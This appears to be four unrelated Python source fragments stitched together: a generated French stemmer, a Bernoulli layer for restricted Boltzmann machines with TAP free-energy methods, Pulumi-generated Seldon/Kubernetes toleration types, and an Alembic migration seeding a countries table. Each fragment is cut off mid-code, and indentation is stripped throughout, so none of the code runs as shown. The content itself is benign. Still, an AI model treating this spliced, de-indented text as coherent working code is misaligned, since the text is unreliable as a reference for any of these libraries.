v_1 = self.limit - self.cursor
try:
# (, line 199
# [, line 199
self.ket = self.cursor
# literal, line 199
if not self.eq_s_b(1, u"s"):
self.cursor = self.limit - v_1
raise lab0()
# ], line 199
self.bra = self.cursor
# test, line 199
v_2 = self.limit - self.cursor
if not self.out_grouping_b(FrenchStemmer.g_keep_with_s, 97, 232):
self.cursor = self.limit - v_1
raise lab0()
self.cursor = self.limit - v_2
# delete, line 199
if not self.slice_del():
return False
except lab0: pass
# setlimit, line 200
v_3 = self.limit - self.cursor
# tomark, line 200
if self.cursor < self.I_pV:
return False
self.cursor = self.I_pV
v_4 = self.limit_backward
self.limit_backward = self.cursor
self.cursor = self.limit - v_3
# (, line 200
# [, line 201
self.ket = self.cursor
# substring, line 201
among_var = self.find_among_b(FrenchStemmer.a_7, 7)
if among_var == 0:
self.limit_backward = v_4
return False
# ], line 201
self.bra = self.cursor
if among_var == 0:
self.limit_backward = v_4
return False
elif among_var == 1:
# (, line 202
# call R2, line 202
if not self.r_R2():
self.limit_backward = v_4
return False
# or, line 202
try:
v_5 = self.limit - self.cursor
try:
# literal, line 202
if not self.eq_s_b(1, u"s"):
raise lab2()
raise lab1()
except lab2: pass
self.cursor = self.limit - v_5
# literal, line 202
if not self.eq_s_b(1, u"t"):
self.limit_backward = v_4
return False
except lab1: pass
# delete, line 202
if not self.slice_del():
return False
elif among_var == 2:
# (, line 204
# <-, line 204
if not self.slice_from(u"i"):
return False
elif among_var == 3:
# (, line 205
# delete, line 205
if not self.slice_del():
return False
elif among_var == 4:
# (, line 206
# literal, line 206
if not self.eq_s_b(2, u"gu"):
self.limit_backward = v_4
return False
# delete, line 206
if not self.slice_del():
return False
self.limit_backward = v_4
return True
def r_un_double(self):
# (, line 211
# test, line 212
v_1 = self.limit - self.cursor
# among, line 212
if self.find_among_b(FrenchStemmer.a_8, 5) == 0:
return False
self.cursor = self.limit - v_1
# [, line 212
self.ket = self.cursor
# next, line 212
if self.cursor <= self.limit_backward:
return False
self.cursor -= 1
# ], line 212
self.bra = self.cursor
# delete, line 212
if not self.slice_del():
return False
return True
def r_un_accent(self):
# (, line 215
# atleast, line 216
v_1 = 1
# atleast, line 216
try:
while True:
try:
try:
if not self.out_grouping_b(FrenchStemmer.g_v, 97, 251):
raise lab2()
v_1 -= 1
raise lab1()
except lab2: pass
raise lab0()
except lab1: pass
except lab0: pass
if v_1 > 0:
return False
# [, line 217
self.ket = self.cursor
# or, line 217
try:
v_3 = self.limit - self.cursor
try:
# literal, line 217
if not self.eq_s_b(1, u"\u00E9"):
raise lab4()
raise lab3()
except lab4: pass
self.cursor = self.limit - v_3
# literal, line 217
if not self.eq_s_b(1, u"\u00E8"):
return False
except lab3: pass
# ], line 217
self.bra = self.cursor
# <-, line 217
if not self.slice_from(u"e"):
return False
return True
def _stem(self):
# (, line 221
# do, line 223
v_1 = self.cursor
try:
# call prelude, line 223
if not self.r_prelude():
raise lab0()
except lab0: pass
self.cursor = v_1
# do, line 224
v_2 = self.cursor
try:
# call mark_regions, line 224
if not self.r_mark_regions():
raise lab1()
except lab1: pass
self.cursor = v_2
# backwards, line 225
self.limit_backward = self.cursor
self.cursor = self.limit
# (, line 225
# do, line 227
v_3 = self.limit - self.cursor
try:
# (, line 227
# or, line 237
try:
v_4 = self.limit - self.cursor
try:
# (, line 228
# and, line 233
v_5 = self.limit - self.cursor
# (, line 229
# or, line 229
try:
v_6 = self.limit - self.cursor
try:
# call standard_suffix, line 229
if not self.r_standard_suffix():
raise lab6()
raise lab5()
except lab6: pass
self.cursor = self.limit - v_6
try:
# call i_verb_suffix, line 230
if not self.r_i_verb_suffix():
raise lab7()
raise lab5()
except lab7: pass
self.cursor = self.limit - v_6
# call verb_suffix, line 231
if not self.r_verb_suffix():
raise lab4()
except lab5: pass
self.cursor = self.limit - v_5
# try, line 234
v_7 = self.limit - self.cursor
try:
# (, line 234
# [, line 234
self.ket = self.cursor
# or, line 234
try:
v_8 = self.limit - self.cursor
try:
# (, line 234
# literal, line 234
if not self.eq_s_b(1, u"Y"):
raise lab10()
# ], line 234
self.bra = self.cursor
# <-, line 234
if not self.slice_from(u"i"):
return False
raise lab9()
except lab10: pass
self.cursor = self.limit - v_8
# (, line 235
# literal, line 235
if not self.eq_s_b(1, u"\u00E7"):
self.cursor = self.limit - v_7
raise lab8()
# ], line 235
self.bra = self.cursor
# <-, line 235
if not self.slice_from(u"c"):
return False
except | |
from collections import namedtuple
from .. import backends as be
from .layer import Layer, CumulantsTAP
ParamsBernoulli = namedtuple("ParamsBernoulli", ["loc"])
class BernoulliLayer(Layer):
"""
Layer with Bernoulli units (i.e., 0 or +1).
"""
def __init__(self, num_units, center=False):
"""
Create a layer with Bernoulli units.
Args:
num_units (int): the size of the layer
center (bool): whether to center the layer
Returns:
Bernoulli layer
"""
super().__init__(num_units, center)
self.rand = be.rand
self.params = ParamsBernoulli(be.zeros(self.len))
#
# Methods for the TAP approximation
#
def get_magnetization(self, mean):
"""
Compute a CumulantsTAP object for the BernoulliLayer.
Args:
mean (tensor (num_units,)): expected values of the units
returns:
CumulantsTAP
"""
return CumulantsTAP(mean, mean - be.square(mean))
def get_zero_magnetization(self):
"""
Create a layer magnetization with zero expectations.
Args:
None
Returns:
CumulantsTAP
"""
return self.get_magnetization(be.zeros_like(self.params[0]))
def get_random_magnetization(self, num_samples=1, epsilon=be.float_scalar(1e-6)):
"""
Create a layer magnetization with random expectations.
Args:
num_samples (int>0): number of random samples to draw
epsilon (float): bound away from [0,1] in which to draw magnetization values
Returns:
CumulantsTAP
"""
# If num_samples == 1 we do not vectorize computations over a sampling set
# for the sake of performance
if num_samples > 1:
return self.get_magnetization(be.clip(be.rand((num_samples,self.len,)),
a_min=epsilon, a_max=be.float_scalar(1-epsilon)))
return self.get_magnetization(be.clip(be.rand((self.len,)),
a_min=epsilon, a_max=be.float_scalar(1-epsilon)))
def clip_magnetization(self, magnetization, a_min=be.float_scalar(1e-6),
a_max=be.float_scalar(1 - 1e-6)):
"""
        Clip the mean of a CumulantsTAP object.
Args:
magnetization (CumulantsTAP) to clip
a_min (float): the minimum value
a_max (float): the maximum value
Returns:
clipped magnetization (CumulantsTAP)
"""
tmp = be.clip(magnetization.mean, a_min=a_min, a_max=a_max)
return self.get_magnetization(tmp)
def clip_magnetization_(self, magnetization, a_min=be.float_scalar(1e-6),
a_max=be.float_scalar(1 - 1e-6)):
"""
        Clip the mean of a CumulantsTAP object.
Args:
magnetization (CumulantsTAP) to clip
a_min (float): the minimum value
a_max (float): the maximum value
Returns:
None
"""
be.clip_(magnetization.mean[:], a_min=a_min, a_max=a_max)
magnetization.variance[:] = magnetization.mean - be.square(magnetization.mean)
def log_partition_function(self, external_field, quadratic_field):
"""
Compute the logarithm of the partition function of the layer
with external field (B) and quadratic field (A).
Let a_i be the loc parameter of unit i.
Let B_i be an external field
Let A_i be a quadratic field
Z_i = Tr_{x_i} exp( a_i x_i + B_i x_i + A_i x_i^2)
= 1 + \exp(a_i + B_i + A_i)
log(Z_i) = softplus(a_i + B_i + A_i)
Args:
external_field (tensor (num_samples, num_units)): external field
quadratic_field (tensor (num_samples, num_units)): quadratic field
Returns:
logZ (tensor (num_samples, num_units)): log partition function
"""
return be.softplus(self.params.loc + quadratic_field + external_field)
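    # Illustrative numeric check (not part of the original class): with zero
    # loc parameters and zero external/quadratic fields each unit contributes
    # softplus(0) = log(2) to the log partition function, e.g.
    #
    #   layer = BernoulliLayer(3)
    #   logZ = layer.log_partition_function(be.zeros(3), be.zeros(3))
    #   # every entry of logZ equals log(2) ~= 0.6931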
def lagrange_multipliers_analytic(self, cumulants):
"""
        Return the Lagrange multipliers (at beta=0) according to the stationarity
conditions {d/da(GibbsFE)=0, d/dc(GibbsFE)=0} at beta=0.
Args:
cumulants (CumulantsTAP object): layer magnetization cumulants
Returns:
lagrange multipliers (CumulantsTAP)
"""
mean = be.subtract(self.params.loc, be.logit(cumulants.mean))
variance = be.zeros_like(cumulants.variance)
return CumulantsTAP(mean, variance)
def update_lagrange_multipliers_(self, cumulants, lagrange_multipliers,
connected_cumulants,
rescaled_connected_weights,
rescaled_connected_weights_sq):
"""
Update, in-place, the Lagrange multipliers with respect to the TAP2 approximation
of the GFE as in
<NAME>, <NAME>, <NAME>, <NAME>,
and <NAME>
"A Deterministic and Generalized Framework for Unsupervised Learning
with Restricted Boltzmann Machines"
Args:
cumulants (CumulantsTAP): layer magnetization cumulants
lagrange_multipliers (CumulantsTAP)
connected_cumulants (CumulantsTAP): connected magnetization cumulants
rescaled_connected_weights (list[tensor, (num_connected_units, num_units)]):
The weights connecting the layers.
rescaled_connected_weights_sq (list[tensor, (num_connected_units, num_units)]):
The cached squares of weights connecting the layers.
(unused on Bernoulli layer)
Returns:
None
"""
lagrange_multipliers.variance[:] = be.zeros_like(lagrange_multipliers.variance)
lagrange_multipliers.mean[:] = be.zeros_like(lagrange_multipliers.mean)
for l in range(len(connected_cumulants)):
# let len(mean) = N and len(connected_mag[l].mean) = N_l
# weights[l] is a matrix of shape (N_l, N)
w_l = rescaled_connected_weights[l]
w2_l = rescaled_connected_weights_sq[l]
lagrange_multipliers.mean[:] += \
be.dot(connected_cumulants[l].mean, w_l) + \
be.multiply(be.dot(connected_cumulants[l].variance, w2_l),
0.5 - cumulants.mean)
def TAP_entropy(self, cumulants):
"""
The TAP-0 Gibbs free energy term associated strictly with this layer
Args:
cumulants (CumulantsTAP): magnetization of the layer
Returns:
(float): 0th order term of Gibbs free energy
"""
# this quadratic approximation is 2x faster:
#a = be.float_scalar(1.06*2.77258872224)
#u = be.float_scalar(1.06*-0.69314718056)
#return be.tsum(be.add(u, a * be.square(be.subtract(0.5, cumulants.mean)))) - \
# be.dot(self.params.loc, cumulants.mean)
alias = 1.0-cumulants.mean
return be.dot(cumulants.mean, be.log(cumulants.mean)) + \
be.dot(alias, be.log(alias)) - \
be.dot(self.params.loc, cumulants.mean)
def TAP_magnetization_grad(self, cumulants,
connected_cumulants, rescaled_connected_weights,
rescaled_connected_weights_sq):
"""
Gradient of the Gibbs free energy with respect to the magnetization
associated strictly with this layer.
Args:
cumulants (CumulantsTAP): magnetization of the layer
connected_cumulants (list[CumulantsTAP]): magnetizations of the connected layers
rescaled_connected_weights (list[tensor, (num_connected_units, num_units)]):
The weights connecting the layers.
rescaled_connected_weights_sq (list[tensor, (num_connected_units, num_units)]):
The cached squares of weights connecting the layers.
Return:
gradient of GFE w.r.t. magnetization (CumulantsTAP)
"""
mean = be.logit(cumulants.mean) - self.params.loc
variance = be.zeros_like(mean)
for l in range(len(connected_cumulants)):
# let len(mean) = N and len(connected_cumulants[l].mean) = N_l
# weights[l] is a matrix of shape (N_l, N)
w_l = rescaled_connected_weights[l]
w2_l = rescaled_connected_weights_sq[l]
mean -= be.dot(connected_cumulants[l].mean, w_l) + \
be.multiply(be.dot(connected_cumulants[l].variance, w2_l),
0.5 - cumulants.mean)
return CumulantsTAP(mean, variance)
def self_consistent_update_(self, cumulants, lagrange_multipliers):
"""
Applies self-consistent TAP update to the layer's magnetization. This formula
is analytically computed --not based on a 2-term truncation of the Gibbs FE.
Args:
cumulants (CumulantsTAP object): magnetization of the layer
lagrange_multipliers (CumulantsTAP object)
Returns:
None
"""
cumulants.mean[:] = be.expit(self.params.loc + lagrange_multipliers.mean)
cumulants.variance[:] = cumulants.mean - be.square(cumulants.mean)
def GFE_derivatives(self, cumulants, connected_cumulants=None,
rescaled_connected_weights=None,
rescaled_connected_weights_sq=None):
"""
Gradient of the Gibbs free energy with respect to local field parameters
Args:
cumulants (CumulantsTAP object): magnetization of the layer
Returns:
gradient parameters (ParamsBernoulli): gradient w.r.t. local fields of GFE
"""
return [ParamsBernoulli(-cumulants.mean)]
#
# Methods for sampling and sample-based training
#
def energy(self, units):
"""
Compute the energy of the Bernoulli layer.
For sample k,
E_k = -\sum_i loc_i * v_i
Args:
units (tensor (num_samples, num_units)): values of units
Returns:
tensor (num_samples,): energy per sample
"""
return -be.dot(units, self.params.loc)
def online_param_update(self, units):
"""
Update the parameters using an observed batch of data.
Used for initializing the layer parameters.
Notes:
Modifies layer.params in place.
Args:
units (tensor (num_samples, num_units)): observed values for units
Returns:
None
"""
self.moments.update(units, axis=0)
self.set_params([ParamsBernoulli(be.logit(self.moments.mean))])
def shrink_parameters(self, shrinkage=1):
"""
Apply shrinkage to the parameters of the layer.
Does nothing for the Bernoulli layer.
Args:
shrinkage (float \in [0,1]): the amount of shrinkage to apply
Returns:
None
"""
pass
def rescale(self, observations):
"""
Rescale is trivial for the Bernoulli layer.
Args:
observations (tensor (num_samples, num_units)):
Values of the observed units.
Returns:
tensor: observations
"""
if not self.center:
return observations
return be.subtract(self.get_center(), observations)
def rescale_cumulants(self, cumulants):
"""
Rescales the cumulants associated with the layer.
Trivial for the Bernoulli layer.
Args:
cumulants (CumulantsTAP)
Returns:
rescaled cumulants (CumulantsTAP)
"""
return cumulants
def reciprocal_scale(self):
"""
Returns a tensor of shape (num_units) providing a reciprocal scale for each unit
Args:
None
Returns:
            reciprocal scale (tensor)
"""
return be.ones_like(self.params[0])
def derivatives(self, units, connected_units, connected_weights,
penalize=True, weighting_function=be.do_nothing):
"""
Compute the derivatives of the layer parameters.
Args:
units (tensor (num_samples, num_units)):
The values of the layer units.
connected_units list[tensor (num_samples, num_connected_units)]:
The rescaled values of the connected units.
connected_weights list[tensor, (num_connected_units, num_units)]:
The weights connecting the layers.
penalize (bool): whether to add a penalty term.
weighting_function (function): a weighting function to apply
to units when computing the gradient.
Returns:
grad (namedtuple): param_name: tensor (contains gradient)
"""
loc = -be.mean(weighting_function(units), axis=0)
if penalize:
loc = self.get_penalty_grad(loc, 'loc')
return [ParamsBernoulli(loc)]
def zero_derivatives(self):
"""
Return an object like the derivatives that is filled with zeros.
Args:
None
Returns:
derivs (List[namedtuple]): List[param_name: tensor] (contains gradient)
"""
return [be.apply(be.zeros_like, self.params)]
def random_derivatives(self):
"""
Return an object like the derivatives that is filled with random floats.
Args:
None
Returns:
derivs (List[namedtuple]): List[param_name: tensor] (contains gradient)
"""
return [be.apply(be.rand_like, self.params)]
def conditional_params(self, scaled_units, weights, beta=None):
"""
Compute the parameters of the layer conditioned on the state
of the connected layers.
Args:
scaled_units list[tensor (num_samples, num_connected_units)]:
The rescaled values of the connected units.
weights list[tensor, (num_connected_units, num_units)]:
The weights connecting the layers.
beta (tensor (num_samples, 1), optional):
Inverse temperatures.
Returns:
tensor: conditional parameters
"""
assert(len(scaled_units) == len(weights))
field = be.dot(scaled_units[0], weights[0])
for i in range(1, len(weights)):
field += be.dot(scaled_units[i], weights[i])
field += self.params.loc
if beta is not None:
field = be.multiply(beta, field)
return field
def conditional_mode(self, scaled_units, weights, beta=None):
"""
Compute the mode of the distribution conditioned on the state
of the connected layers.
Args:
scaled_units list[tensor (num_samples, num_connected_units)]:
The rescaled values of the | |
"gmsa_credential_spec")
@property
@pulumi.getter(name="gmsaCredentialSpecName")
def gmsa_credential_spec_name(self) -> Optional[str]:
"""
GMSACredentialSpecName is the name of the GMSA credential spec to use.
"""
return pulumi.get(self, "gmsa_credential_spec_name")
@property
@pulumi.getter(name="runAsUserName")
def run_as_user_name(self) -> Optional[str]:
"""
The UserName in Windows to run the entrypoint of the container process. Defaults to the user specified in image metadata if unspecified. May also be set in PodSecurityContext. If set in both SecurityContext and PodSecurityContext, the value specified in SecurityContext takes precedence.
"""
return pulumi.get(self, "run_as_user_name")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SeldonDeploymentSpecPredictorsComponentSpecsSpecTolerations(dict):
"""
The pod this Toleration is attached to tolerates any taint that matches the triple <key,value,effect> using the matching operator <operator>.
"""
def __init__(__self__, *,
effect: Optional[str] = None,
key: Optional[str] = None,
operator: Optional[str] = None,
toleration_seconds: Optional[int] = None,
value: Optional[str] = None):
"""
The pod this Toleration is attached to tolerates any taint that matches the triple <key,value,effect> using the matching operator <operator>.
:param str effect: Effect indicates the taint effect to match. Empty means match all taint effects. When specified, allowed values are NoSchedule, PreferNoSchedule and NoExecute.
:param str key: Key is the taint key that the toleration applies to. Empty means match all taint keys. If the key is empty, operator must be Exists; this combination means to match all values and all keys.
:param str operator: Operator represents a key's relationship to the value. Valid operators are Exists and Equal. Defaults to Equal. Exists is equivalent to wildcard for value, so that a pod can tolerate all taints of a particular category.
:param int toleration_seconds: TolerationSeconds represents the period of time the toleration (which must be of effect NoExecute, otherwise this field is ignored) tolerates the taint. By default, it is not set, which means tolerate the taint forever (do not evict). Zero and negative values will be treated as 0 (evict immediately) by the system.
:param str value: Value is the taint value the toleration matches to. If the operator is Exists, the value should be empty, otherwise just a regular string.
"""
if effect is not None:
pulumi.set(__self__, "effect", effect)
if key is not None:
pulumi.set(__self__, "key", key)
if operator is not None:
pulumi.set(__self__, "operator", operator)
if toleration_seconds is not None:
pulumi.set(__self__, "toleration_seconds", toleration_seconds)
if value is not None:
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def effect(self) -> Optional[str]:
"""
Effect indicates the taint effect to match. Empty means match all taint effects. When specified, allowed values are NoSchedule, PreferNoSchedule and NoExecute.
"""
return pulumi.get(self, "effect")
@property
@pulumi.getter
def key(self) -> Optional[str]:
"""
Key is the taint key that the toleration applies to. Empty means match all taint keys. If the key is empty, operator must be Exists; this combination means to match all values and all keys.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter
def operator(self) -> Optional[str]:
"""
Operator represents a key's relationship to the value. Valid operators are Exists and Equal. Defaults to Equal. Exists is equivalent to wildcard for value, so that a pod can tolerate all taints of a particular category.
"""
return pulumi.get(self, "operator")
@property
@pulumi.getter(name="tolerationSeconds")
def toleration_seconds(self) -> Optional[int]:
"""
TolerationSeconds represents the period of time the toleration (which must be of effect NoExecute, otherwise this field is ignored) tolerates the taint. By default, it is not set, which means tolerate the taint forever (do not evict). Zero and negative values will be treated as 0 (evict immediately) by the system.
"""
return pulumi.get(self, "toleration_seconds")
@property
@pulumi.getter
def value(self) -> Optional[str]:
"""
Value is the taint value the toleration matches to. If the operator is Exists, the value should be empty, otherwise just a regular string.
"""
return pulumi.get(self, "value")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
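# Illustrative note (not generated code): in Kubernetes terms, a toleration such as
#   {"key": "dedicated", "operator": "Equal", "value": "ml", "effect": "NoSchedule"}
# lets a pod schedule onto nodes carrying the taint dedicated=ml:NoSchedule; the output
# type above is the read-side representation of exactly that object.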
@pulumi.output_type
class SeldonDeploymentSpecPredictorsComponentSpecsSpecTopologySpreadConstraints(dict):
"""
TopologySpreadConstraint specifies how to spread matching pods among the given topology.
"""
def __init__(__self__, *,
max_skew: int,
topology_key: str,
when_unsatisfiable: str,
label_selector: Optional['outputs.SeldonDeploymentSpecPredictorsComponentSpecsSpecTopologySpreadConstraintsLabelSelector'] = None):
"""
TopologySpreadConstraint specifies how to spread matching pods among the given topology.
:param int max_skew: MaxSkew describes the degree to which pods may be unevenly distributed. It's the maximum permitted difference between the number of matching pods in any two topology domains of a given topology type. For example, in a 3-zone cluster, MaxSkew is set to 1, and pods with the same labelSelector spread as 1/1/0: | zone1 | zone2 | zone3 | | P | P | | - if MaxSkew is 1, incoming pod can only be scheduled to zone3 to become 1/1/1; scheduling it onto zone1(zone2) would make the ActualSkew(2-0) on zone1(zone2) violate MaxSkew(1). - if MaxSkew is 2, incoming pod can be scheduled onto any zone. It's a required field. Default value is 1 and 0 is not allowed.
:param str topology_key: TopologyKey is the key of node labels. Nodes that have a label with this key and identical values are considered to be in the same topology. We consider each <key, value> as a "bucket", and try to put balanced number of pods into each bucket. It's a required field.
:param str when_unsatisfiable: WhenUnsatisfiable indicates how to deal with a pod if it doesn't satisfy the spread constraint. - DoNotSchedule (default) tells the scheduler not to schedule it - ScheduleAnyway tells the scheduler to still schedule it It's considered as "Unsatisfiable" if and only if placing incoming pod on any topology violates "MaxSkew". For example, in a 3-zone cluster, MaxSkew is set to 1, and pods with the same labelSelector spread as 3/1/1: | zone1 | zone2 | zone3 | | P P P | P | P | If WhenUnsatisfiable is set to DoNotSchedule, incoming pod can only be scheduled to zone2(zone3) to become 3/2/1(3/1/2) as ActualSkew(2-1) on zone2(zone3) satisfies MaxSkew(1). In other words, the cluster can still be imbalanced, but scheduler won't make it *more* imbalanced. It's a required field.
:param 'SeldonDeploymentSpecPredictorsComponentSpecsSpecTopologySpreadConstraintsLabelSelectorArgs' label_selector: LabelSelector is used to find matching pods. Pods that match this label selector are counted to determine the number of pods in their corresponding topology domain.
"""
pulumi.set(__self__, "max_skew", max_skew)
pulumi.set(__self__, "topology_key", topology_key)
pulumi.set(__self__, "when_unsatisfiable", when_unsatisfiable)
if label_selector is not None:
pulumi.set(__self__, "label_selector", label_selector)
@property
@pulumi.getter(name="maxSkew")
def max_skew(self) -> int:
"""
MaxSkew describes the degree to which pods may be unevenly distributed. It's the maximum permitted difference between the number of matching pods in any two topology domains of a given topology type. For example, in a 3-zone cluster, MaxSkew is set to 1, and pods with the same labelSelector spread as 1/1/0: | zone1 | zone2 | zone3 | | P | P | | - if MaxSkew is 1, incoming pod can only be scheduled to zone3 to become 1/1/1; scheduling it onto zone1(zone2) would make the ActualSkew(2-0) on zone1(zone2) violate MaxSkew(1). - if MaxSkew is 2, incoming pod can be scheduled onto any zone. It's a required field. Default value is 1 and 0 is not allowed.
"""
return pulumi.get(self, "max_skew")
@property
@pulumi.getter(name="topologyKey")
def topology_key(self) -> str:
"""
TopologyKey is the key of node labels. Nodes that have a label with this key and identical values are considered to be in the same topology. We consider each <key, value> as a "bucket", and try to put balanced number of pods into each bucket. It's a required field.
"""
return pulumi.get(self, "topology_key")
@property
@pulumi.getter(name="whenUnsatisfiable")
def when_unsatisfiable(self) -> str:
"""
WhenUnsatisfiable indicates how to deal with a pod if it doesn't satisfy the spread constraint. - DoNotSchedule (default) tells the scheduler not to schedule it - ScheduleAnyway tells the scheduler to still schedule it It's considered as "Unsatisfiable" if and only if placing incoming pod on any topology violates "MaxSkew". For example, in a 3-zone cluster, MaxSkew is set to 1, and pods with the same labelSelector spread as 3/1/1: | zone1 | zone2 | zone3 | | P P P | P | P | If | |
<filename>migrations/versions/be21086640ad_country_added.py
"""Country added
Revision ID: be21086640ad
Revises: <PASSWORD>
Create Date: 2021-11-09 15:34:04.306218
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'be21086640ad'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
naming_convention = {
"ix": 'ix_%(column_0_label)s',
"uq": "uq_%(table_name)s_%(column_0_name)s",
"ck": "ck_%(table_name)s_%(column_0_name)s",
"fk": "fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s",
"pk": "pk_%(table_name)s"
}
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('countries',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('iso', sa.String(length=2), nullable=True),
sa.Column('name', sa.String(length=80), nullable=True),
sa.Column('nicename', sa.String(length=80), nullable=True),
sa.Column('iso3', sa.String(length=3), nullable=True),
sa.Column('numcode', sa.Integer(), nullable=True),
sa.Column('phonecode', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
with op.batch_alter_table('companies', schema=None, naming_convention=naming_convention) as batch_op:
batch_op.add_column(sa.Column('country_id', sa.Integer(), nullable=True))
batch_op.create_foreign_key(batch_op.f('fk_company_country_id_country'), 'countries', ['country_id'], ['id'])
# ### end Alembic commands ###
op.execute("""
INSERT INTO `countries` (`id`, `iso`, `name`, `nicename`, `iso3`, `numcode`, `phonecode`) VALUES
(1, 'AF', 'AFGHANISTAN', 'Afghanistan', 'AFG', 4, 93),
(2, 'AL', 'ALBANIA', 'Albania', 'ALB', 8, 355),
(3, 'DZ', 'ALGERIA', 'Algeria', 'DZA', 12, 213),
(4, 'AS', 'AMERICAN SAMOA', 'American Samoa', 'ASM', 16, 1684),
(5, 'AD', 'ANDORRA', 'Andorra', 'AND', 20, 376),
(6, 'AO', 'ANGOLA', 'Angola', 'AGO', 24, 244),
(7, 'AI', 'ANGUILLA', 'Anguilla', 'AIA', 660, 1264),
(8, 'AQ', 'ANTARCTICA', 'Antarctica', NULL, NULL, 0),
(9, 'AG', 'ANTIGUA AND BARBUDA', 'Antigua and Barbuda', 'ATG', 28, 1268),
(10, 'AR', 'ARGENTINA', 'Argentina', 'ARG', 32, 54),
(11, 'AM', 'ARMENIA', 'Armenia', 'ARM', 51, 374),
(12, 'AW', 'ARUBA', 'Aruba', 'ABW', 533, 297),
(13, 'AU', 'AUSTRALIA', 'Australia', 'AUS', 36, 61),
(14, 'AT', 'AUSTRIA', 'Austria', 'AUT', 40, 43),
(15, 'AZ', 'AZERBAIJAN', 'Azerbaijan', 'AZE', 31, 994),
(16, 'BS', 'BAHAMAS', 'Bahamas', 'BHS', 44, 1242),
(17, 'BH', 'BAHRAIN', 'Bahrain', 'BHR', 48, 973),
(18, 'BD', 'BANGLADESH', 'Bangladesh', 'BGD', 50, 880),
(19, 'BB', 'BARBADOS', 'Barbados', 'BRB', 52, 1246),
(20, 'BY', 'BELARUS', 'Belarus', 'BLR', 112, 375),
(21, 'BE', 'BELGIUM', 'Belgium', 'BEL', 56, 32),
(22, 'BZ', 'BELIZE', 'Belize', 'BLZ', 84, 501),
(23, 'BJ', 'BENIN', 'Benin', 'BEN', 204, 229),
(24, 'BM', 'BERMUDA', 'Bermuda', 'BMU', 60, 1441),
(25, 'BT', 'BHUTAN', 'Bhutan', 'BTN', 64, 975),
(26, 'BO', 'BOLIVIA', 'Bolivia', 'BOL', 68, 591),
(27, 'BA', 'BOSNIA AND HERZEGOVINA', 'Bosnia and Herzegovina', 'BIH', 70, 387),
(28, 'BW', 'BOTSWANA', 'Botswana', 'BWA', 72, 267),
(29, 'BV', 'BOUVET ISLAND', 'Bouvet Island', NULL, NULL, 0),
(30, 'BR', 'BRAZIL', 'Brazil', 'BRA', 76, 55),
(31, 'IO', 'BRITISH INDIAN OCEAN TERRITORY', 'British Indian Ocean Territory', NULL, NULL, 246),
(32, 'BN', 'BRUNEI DARUSSALAM', 'Brunei Darussalam', 'BRN', 96, 673),
(33, 'BG', 'BULGARIA', 'Bulgaria', 'BGR', 100, 359),
(34, 'BF', 'BURKINA FASO', 'Burkina Faso', 'BFA', 854, 226),
(35, 'BI', 'BURUNDI', 'Burundi', 'BDI', 108, 257),
(36, 'KH', 'CAMBODIA', 'Cambodia', 'KHM', 116, 855),
(37, 'CM', 'CAMEROON', 'Cameroon', 'CMR', 120, 237),
(38, 'CA', 'CANADA', 'Canada', 'CAN', 124, 1),
(39, 'CV', 'CAPE VERDE', 'Cape Verde', 'CPV', 132, 238),
(40, 'KY', 'CAYMAN ISLANDS', 'Cayman Islands', 'CYM', 136, 1345),
(41, 'CF', 'CENTRAL AFRICAN REPUBLIC', 'Central African Republic', 'CAF', 140, 236),
(42, 'TD', 'CHAD', 'Chad', 'TCD', 148, 235),
(43, 'CL', 'CHILE', 'Chile', 'CHL', 152, 56),
(44, 'CN', 'CHINA', 'China', 'CHN', 156, 86),
(45, 'CX', 'CHRISTMAS ISLAND', 'Christmas Island', NULL, NULL, 61),
(46, 'CC', 'COCOS (KEELING) ISLANDS', 'Cocos (Keeling) Islands', NULL, NULL, 672),
(47, 'CO', 'COLOMBIA', 'Colombia', 'COL', 170, 57),
(48, 'KM', 'COMOROS', 'Comoros', 'COM', 174, 269),
(49, 'CG', 'CONGO', 'Congo', 'COG', 178, 242),
(50, 'CD', 'CONGO, THE DEMOCRATIC REPUBLIC OF THE', 'Congo, the Democratic Republic of the', 'COD', 180, 242),
(51, 'CK', 'COOK ISLANDS', 'Cook Islands', 'COK', 184, 682),
(52, 'CR', 'COSTA RICA', 'Costa Rica', 'CRI', 188, 506),
(53, 'CI', 'COTE D''IVOIRE', 'Cote D''Ivoire', 'CIV', 384, 225),
(54, 'HR', 'CROATIA', 'Croatia', 'HRV', 191, 385),
(55, 'CU', 'CUBA', 'Cuba', 'CUB', 192, 53),
(56, 'CY', 'CYPRUS', 'Cyprus', 'CYP', 196, 357),
(57, 'CZ', 'CZECH REPUBLIC', 'Czech Republic', 'CZE', 203, 420),
(58, 'DK', 'DENMARK', 'Denmark', 'DNK', 208, 45),
(59, 'DJ', 'DJIBOUTI', 'Djibouti', 'DJI', 262, 253),
(60, 'DM', 'DOMINICA', 'Dominica', 'DMA', 212, 1767),
(61, 'DO', 'DOMINICAN REPUBLIC', 'Dominican Republic', 'DOM', 214, 1809),
(62, 'EC', 'ECUADOR', 'Ecuador', 'ECU', 218, 593),
(63, 'EG', 'EGYPT', 'Egypt', 'EGY', 818, 20),
(64, 'SV', 'EL SALVADOR', 'El Salvador', 'SLV', 222, 503),
(65, 'GQ', 'EQUATORIAL GUINEA', 'Equatorial Guinea', 'GNQ', 226, 240),
(66, 'ER', 'ERITREA', 'Eritrea', 'ERI', 232, 291),
(67, 'EE', 'ESTONIA', 'Estonia', 'EST', 233, 372),
(68, 'ET', 'ETHIOPIA', 'Ethiopia', 'ETH', 231, 251),
(69, 'FK', 'FALKLAND ISLANDS (MALVINAS)', 'Falkland Islands (Malvinas)', 'FLK', 238, 500),
(70, 'FO', 'FAROE ISLANDS', 'Faroe Islands', 'FRO', 234, 298),
(71, 'FJ', 'FIJI', 'Fiji', 'FJI', 242, 679),
(72, 'FI', 'FINLAND', 'Finland', 'FIN', 246, 358),
(73, 'FR', 'FRANCE', 'France', 'FRA', 250, 33),
(74, 'GF', 'FRENCH GUIANA', 'French Guiana', 'GUF', 254, 594),
